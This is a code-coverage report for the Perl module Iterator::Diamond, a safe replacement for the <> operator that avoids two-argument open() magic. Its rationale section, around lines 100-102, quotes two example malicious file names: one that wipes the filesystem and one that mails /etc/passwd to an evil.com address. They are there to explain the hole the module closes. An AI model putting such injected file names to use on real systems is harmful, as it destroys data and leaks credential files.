File Coverage

blib/lib/Iterator/Diamond.pm
Criterion Covered Total %
statement 35 35 100.0
branch 7 8 87.5
condition 8 12 66.6
subroutine 9 9 100.0
pod 1 2 50.0
total 60 66 90.9


line stmt bran cond sub pod time code
1             #! perl
2              
3             package Iterator::Diamond;
4              
5 10     10   686729 use warnings;
  10         108  
  10         315  
6 10     10   53 use strict;
  10         16  
  10         179  
7 10     10   40 use Carp;
  10         17  
  10         491  
8 10     10   49 use base qw(Iterator::Files);
  10         19  
  10         3004  
9              
10             =head1 NAME
11            
12             Iterator::Diamond - Iterate through the files from ARGV
13            
14             =cut
15              
16             our $VERSION = '1.01';
17             $VERSION =~ tr/_//d;
18              
19             =head1 SYNOPSIS
20            
21             use Iterator::Diamond;
22            
23             $input = Iterator::Diamond->new;
24             while ( <$input> ) {
25             ...
26             warn("Current file is $ARGV\n");
27             }
28            
29             # Alternatively:
30             while ( $input->has_next ) {
31             $line = $input->next;
32             ...
33             }
34            
35             =head1 DESCRIPTION
36            
37             Iterator::Diamond provides a safe and customizable replacement for the
38             C<< <> >> (Diamond) operator.
39            
40             Just like C<< <> >> it returns the records of all files specified in
41             C<@ARGV>, one by one, as if it were one big happy file. In-place
42             editing of files is also supported. It does use C<@ARGV>, C<$ARGV> and
43             C<ARGVOUT> as documented in L<perlrun>, though without magic.
44            
45             As opposed to the built-in C<< <> >> operator, no magic is applied to
46             the file names unless explicitly requested. This means that you're
47             protected from file names that may wreak havoc to your system when
48             processed through the magic of the two-argument open() that Perl
49             normally uses for C<< <> >>.
50            
51             Iterator::Diamond is based on L<Iterator::Files>.
52            
53             =head1 RATIONALE
54            
55             Perl has two forms of open(), one with 2 arguments and one with 3 (or
56             more) arguments.
57            
58             The 2-argument open is magical. It opens a file for reading or writing
59             according to a leading '<' or '>', strips leading and trailing
60             whitespace, starts programs and reads their output, or writes to their
61             input. A filename '-' is taken to be the standard input or output of
62             the program, depending on whether the file is opened for reading or
63             writing.
64            
65             The 3-argument open is strict. The second argument designates the way
66             the file should be opened, and the third argument contains the file
67             name, taken literally.
68            
69             Many programs read a series of files whose names are passed as command
70             line argument. The diamond operator makes this very easy:
71            
72             while ( <> ) {
73             ....
74             }
75            
76             The program can then be run as something like
77            
78             myprog *.txt
79            
80             Internally, Perl uses the 2-argument open for this.
81            
82             What's wrong with that?
83            
84             Well, this goes horribly wrong if you have file names that trigger the
85             magic of Perl's 2-argument open.
86            
87             For example, if you have a file named ' foo.txt' (note the leading
88             space), running
89            
90             myprog *.txt
91            
92             will surprise you with the error message
93            
94             Can't open foo.txt: No such file or directory
95            
96             This is still reasonably harmless. But what if you have a file
97             '>bar.txt'? Now, silently a new file 'bar.txt' is created. If you're
98             lucky, that is. It can also silently wipe out valuable data.
99            
100             When your system administrator runs scripts like this, malicous file
101             names like 'rm -fr / |' or '|mail < /etc/passwd badguy@evil.com' can
102             be a severe threat to your system.
103            
104             After a long discussion on the perl mailing list it was felt that this
105             security hole should be fixed. Iterator::Diamond does this by
106             providing a decent iterator that behaves just like C<< <> >>, but with
107             safe semantics.
108            
109             If your perl is v5.22 or newer, and your script needs the diamond
110             iterator just inside a while loop condition, you can replace C<< <> >>
111             by C<<< <<>> >>> to get similar security. Note, however, that a file
112             name of C<< '-' >> can not be interpreted as STDIN with that construct.
113            
114             =head1 FUNCTIONS
115            
116             =head2 new
117            
118             Constructor. Creates a new iterator.
119            
120             The iterator can be used by calling its methods, but it can also be
121             used as argument to the readline operator. See the examples in
122             L<SYNOPSIS>.
123            
124             B<new> takes an optional series of key/value pairs to control the
125             exact way the iterator must behave.
126            
127             =over 4
128            
129             =item B<< magic => >> { none | stdin | all }
130            
131             C<none> applies three-argument open semantics to all file names and do
132             not use any magic. This is the default behaviour.
133            
134             C<stdin> is also safe. It applies three-argument open semantics but
135             allows a file name consisting of a single dash C<< - >> to mean the
136             standard input of the program. This is often very convenient.
137            
138             C<all> applies two-argument open semantics. This makes the iteration
139             unsafe again, just like the built-in C<< <> >> operator.
140            
141             =item B<< edit => >> I<suffix>
142            
143             Enables in-place editing of files, just as the built-in C<< <> >> operator.
144            
145             Unlike the built-in operator semantics, an empty suffix to discard backup
146             files is not supported.
147            
148             =item B<< use_i_option >> I<boolean>
149            
150             If set to true, and if B<edit> is not specified, the perl command line
151             option C<-i>I<suffix> will be used to enable or disable in-place editing.
152             By default, perl command line options are ignored.
153            
154             =item B<< files => >> I<aref>
155            
156             Use this list of files instead of @ARGV.
157            
158             If C<files> are not specified and C<stdin> or C<all> magic is in effect,
159             an empty @ARGV will be treated as a list containing a single dash C<< - >>.
160            
161             =back
162            
163             =cut
164              
165             sub new {
166 17     17 1 15595     my ($pkg, %args) = @_;
167 17         49     my $use_i_option = delete $args{use_i_option};
168 17 50 66     67     if ($use_i_option && !exists($args{edit}) && defined $^I) {
      66        
169 2         5         $args{edit} = $^I;
170                 }
171 17         150     my $self = $pkg->SUPER::new( files => \@ARGV, %args );
172 15 100 66     106     if ( !exists($args{files}) && !@ARGV && $self->_magic_stdin ) {
      66        
173 1         8         @ARGV = qw(-);
174                 }
175 15         30     $self->{_current_file} = \$ARGV;
176 15         70     return $self;
177             }
178              
179             =head2 next
180            
181             Method, no arguments.
182            
183             Returns the next record of the input stream, or undef if the stream is
184             exhausted.
185            
186             =cut
187              
188             sub readline {
189 54     54 0 1876     shift->SUPER::readline;
190             }
191              
192             #### WARNING ####
193             # From overload.pm: Even in list context, the iterator is currently
194             # called only once and with scalar context.
195 10     10   82 use overload '<>' => \&readline;
  10         18  
  10         37  
196              
197             sub _advance {
198 31     31   47     my $self = shift;
199 31         92     my $res = $self->SUPER::_advance;
200 29 100       105     return unless $res;
201 15         144     open(ARGV, '<&=', fileno($self->{_current_fh}));
202 15 100       44     if ( $self->{_edit} ) {
203 10     10   795 no warnings 'once';
  10         20  
  10         865  
204 2         16 open(ARGVOUT, '>&=', fileno($self->{_rewrite_fh}));
205                 }
206 15         53     return $res;
207             }
208              
209             =head2 has_next
210            
211             Method, no arguments.
212            
213             Returns true if the stream is not exhausted. A subsequent call to
214             C<next> will return a defined value.
215            
216             This is the equivalent of the 'eof()' function.
217            
218             =cut
219              
220             =head2 is_eof
221            
222             Method, no arguments.
223            
224             Returns true if the current file is exhausted. A subsequent call to
225             C<next> will open the next file if available and start reading it.
226            
227             This is the equivalent of the 'eof' function.
228            
229             =cut
230              
231             =head2 current_file
232            
233             Method, no arguments.
234            
235             Returns the name of the current file being processed.
236            
237             =cut
238              
239             =head1 GLOBAL VARIABLES
240            
241             Since Iterator::Diamond is a plug-in replacement for the built-in C<<
242             <> >> operator, it uses the same global variables as C<< <> >> for the
243             same purposes.
244            
245             =over 4
246            
247             =item @ARGV
248            
249             The list of file names to be processed. When a new file is opened, its
250             name is removed from the list.
251            
252             =item $ARGV
253            
254             The name of the file currently being processed. This can also be
255             obtained by using the iterators C<current_file> method.
256            
257             =item $^I
258            
259             Enables in-place editing and, optionally, designates the backup suffix
260             for edited files. See L<perlrun> for details.
261            
262             Setting C<$^I> to I<suffix> has the same effect as using the Perl
263             command line argument C<-I>I<suffix> or using the C<edit=>I<suffix>
264             option to the iterator constructor.
265            
266             =item ARGVOUT
267            
268             When in-place editing, this file handle is used to open the new,
269             possibly modified, file to be written. This file handle is select()ed
270             for standard output.
271            
272             =back
273            
274             =head1 LIMITATIONS
275            
276             Perl's internal ARGV processing is very magical, and cannot be
277             completely implemented in plain perl. However, the discrepancies
278             should not be noticeable in normal situations.
279            
280             Even in list context, the iterator C<< <$input> >> is currently called
281             only once and with scalar context. This will not work as expected:
282            
283             my @lines = <$input>;
284            
285             This reads all remaining lines:
286            
287             my @lines = $input->readline;
288            
289             =head1 SEE ALSO
290            
291             L<Iterator::Files>, open() in L<perlfun>, L<perlopentut>,
292             I/O Operators in L<perlop>.
293            
294             =head1 AUTHOR
295            
296             Johan Vromans, C<< <jv at cpan.org> >>
297            
298             =head1 BUGS
299            
300             Please report any bugs or feature requests to C<bug-iterator-diamond
301             at rt.cpan.org>, or through the web interface at
302             L<http://rt.cpan.org/NoAuth/ReportBug.html?Queue=Iterator-Diamond>. I
303             will be notified, and then you'll automatically be notified of
304             progress on your bug as I make changes.
305            
306             =head1 SUPPORT
307            
308             You can find documentation for this module with the perldoc command.
309            
310             perldoc Iterator::Diamond
311            
312             You can also look for information at:
313            
314             =over 4
315            
316             =item * RT: CPAN's request tracker
317            
318             L<http://rt.cpan.org/NoAuth/Bugs.html?Dist=Iterator-Diamond>
319            
320             =item * CPAN Ratings
321            
322             L<http://cpanratings.perl.org/d/Iterator-Diamond>
323            
324             =item * Search CPAN
325            
326             L<http://search.cpan.org/dist/Iterator-Diamond>
327            
328             =back
329            
330             =head1 ACKNOWLEDGEMENTS
331            
332             This package was inspired by a most interesting discussion of the
333             perl5-porters mailing list, July 2008, on the topic of the unsafeness
334             of two-argument open() and its use in the C<< <> >> operator.
335            
336             =head1 COPYRIGHT & LICENSE
337            
338             Copyright 2016,2008 Johan Vromans, all rights reserved.
339            
340             This program is free software; you can redistribute it and/or modify it
341             under the same terms as Perl itself.
342            
343             =cut
344              
345             =begin maybe_later
346            
347             sub TIEHANDLE {
348             goto &new;
349             }
350            
351             sub READLINE {
352             goto &readline;
353             }
354            
355             tie *::ARGV, 'Iterator::Diamond';
356            
357             =end maybe_later
358            
359             =cut
360              
361             1; # End of Iterator::Diamond
362              
363             __END__
364